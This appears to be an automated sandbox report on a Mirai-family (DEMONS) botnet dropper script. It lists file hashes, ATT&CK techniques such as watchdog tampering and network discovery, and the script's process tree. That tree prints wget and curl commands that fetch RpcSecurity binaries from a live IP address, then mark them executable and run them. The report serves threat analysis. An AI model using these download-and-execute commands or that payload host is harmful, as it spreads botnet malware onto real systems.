mirai | ce9a5d9b5c25ecfcde1c946901db42efdfa881de812e2a1cab84b1650b057a7a

Analysis

max time kernel
148s
max time network
149s
platform
ubuntu-18.04_amd64
resource
ubuntu1804-amd64-20240611-en
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
27-12-2024 06:52

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

GuruITDDoS3.sh
Size

2KB
MD5

c01f89f66afa819108643774b814bfaf
SHA1

abde31c7a7b764f70527ef07b3f57a9993b949b8
SHA256

ce9a5d9b5c25ecfcde1c946901db42efdfa881de812e2a1cab84b1650b057a7a
SHA512

a5e94401ba1d9e605e4c65143c57eb3235ee0a6a63f71e55a129e57cf6252c33f51aa2ee46271796d7b21f28eb1cbbbd6fa0d380de376714dcc17e05ebd06f80

Score

10^/10

mirai demons botnet defense_evasion discovery

Malware Config

Extracted

Family

mirai

Botnet

DEMONS

Signatures

Mirai
Mirai is a prevalent Linux malware infecting exposed network devices.
botnet mirai
Mirai family
mirai

File and Directory Permissions Modification 1 TTPs 2 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
1506	chmod
1513	chmod

Executes dropped EXE 2 IoCs

ioc	pid	Process
/tmp/RpcSecurity	1507	RpcSecurity
/tmp/RpcSecurity	1514	RpcSecurity

Modifies Watchdog functionality 1 TTPs 2 IoCs

Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

defense_evasion

Impair Defenses

T1562

description	ioc	Process
File opened for modification	/dev/watchdog	RpcSecurity
File opened for modification	/dev/misc/watchdog	RpcSecurity

Enumerates active TCP sockets 1 TTPs 2 IoCs

Gets active TCP sockets from /proc virtual filesystem.

discovery

System Network Connections Discovery

T1049

description	ioc	Process
File opened for reading	/proc/net/tcp	RpcSecurity
File opened for reading	/proc/net/tcp	RpcSecurity

Writes file to system bin folder 1 IoCs

description	ioc	Process
File opened for modification	/sbin/watchdog	RpcSecurity

Changes its process name 1 IoCs

description	pid	Process
Changes the process name, possibly in an attempt to hide itself	1507	RpcSecurity

Reads system network configuration 1 TTPs 2 IoCs

Uses contents of /proc filesystem to enumerate network settings.

discovery

Internet Connection Discovery

T1016.001

description	ioc	Process
File opened for reading	/proc/net/tcp	RpcSecurity
File opened for reading	/proc/net/tcp	RpcSecurity

System Network Configuration Discovery 1 TTPs 2 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
1509	wget
1511	curl

Writes file to tmp directory 5 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/RpcSecurity.mips	curl
File opened for modification	/tmp/RpcSecurity.x86	wget
File opened for modification	/tmp/RpcSecurity.x86	curl
File opened for modification	/tmp/RpcSecurity	GuruITDDoS3.sh
File opened for modification	/tmp/RpcSecurity.mips	wget

/tmp/GuruITDDoS3.sh
/tmp/GuruITDDoS3.sh
1⤵
- Writes file to tmp directory
PID:1499
- /usr/bin/wget
  wget http://5.175.237.74/GuruITDDoS/RpcSecurity.x86
  2⤵
  - Writes file to tmp directory
  PID:1500
- /usr/bin/curl
  curl -O http://5.175.237.74/GuruITDDoS/RpcSecurity.x86
  2⤵
  - Writes file to tmp directory
  PID:1504
- /bin/cat
  cat RpcSecurity.x86
  2⤵
  PID:1505
- /bin/chmod
  chmod +x config-err-4Wxxtz GuruITDDoS3.sh netplan_9nr5x9m8 RpcSecurity RpcSecurity.x86 snap-private-tmp ssh-H6Rv75Lvs454 systemd-private-a9d2513fba0d4603b2ec873486986d62-bolt.service-4oDCuu systemd-private-a9d2513fba0d4603b2ec873486986d62-colord.service-8CAVMA systemd-private-a9d2513fba0d4603b2ec873486986d62-ModemManager.service-aIuSNU systemd-private-a9d2513fba0d4603b2ec873486986d62-systemd-resolved.service-ALiFi9 systemd-private-a9d2513fba0d4603b2ec873486986d62-systemd-timedated.service-fdDcU3
  2⤵
  - File and Directory Permissions Modification
  PID:1506
- /tmp/RpcSecurity
  ./RpcSecurity
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Enumerates active TCP sockets
  - Writes file to system bin folder
  - Changes its process name
  - Reads system network configuration
  PID:1507
- /usr/bin/wget
  wget http://5.175.237.74/GuruITDDoS/RpcSecurity.mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:1509
- /usr/bin/curl
  curl -O http://5.175.237.74/GuruITDDoS/RpcSecurity.mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:1511
- /bin/chmod
  chmod +x config-err-4Wxxtz GuruITDDoS3.sh netplan_9nr5x9m8 RpcSecurity RpcSecurity.mips RpcSecurity.x86 snap-private-tmp ssh-H6Rv75Lvs454 systemd-private-a9d2513fba0d4603b2ec873486986d62-bolt.service-4oDCuu systemd-private-a9d2513fba0d4603b2ec873486986d62-colord.service-8CAVMA systemd-private-a9d2513fba0d4603b2ec873486986d62-ModemManager.service-aIuSNU systemd-private-a9d2513fba0d4603b2ec873486986d62-systemd-resolved.service-ALiFi9 systemd-private-a9d2513fba0d4603b2ec873486986d62-systemd-timedated.service-fdDcU3
  2⤵
  - File and Directory Permissions Modification
  PID:1513
- /tmp/RpcSecurity
  ./RpcSecurity
  2⤵
  - Executes dropped EXE
  - Enumerates active TCP sockets
  - Reads system network configuration
  PID:1514

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Impair Defenses

T1562

Credential Access

Discovery

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

System Network Connections Discovery

T1049

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/RpcSecurity.x86

Filesize
54KB

MD5
7e83ac9f8b9ae088c5336df0d874926f

SHA1
a5fe7d25942a9f04f8a4cfb57d5781d7042a48d5

SHA256
1b8b5cc9cb64473380cd6898f7580339f38a3cd6e7f90d1768c7842e998bb3ed

SHA512
0e4dda062bb583dad01c1a9ab9018303003dce5078c30af63b222fa82b93f4fc19bc0bdd6e8f4c3024b0d9502470bbf26238ea991f08ded59e040b89f3156d2b

Download Submit

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads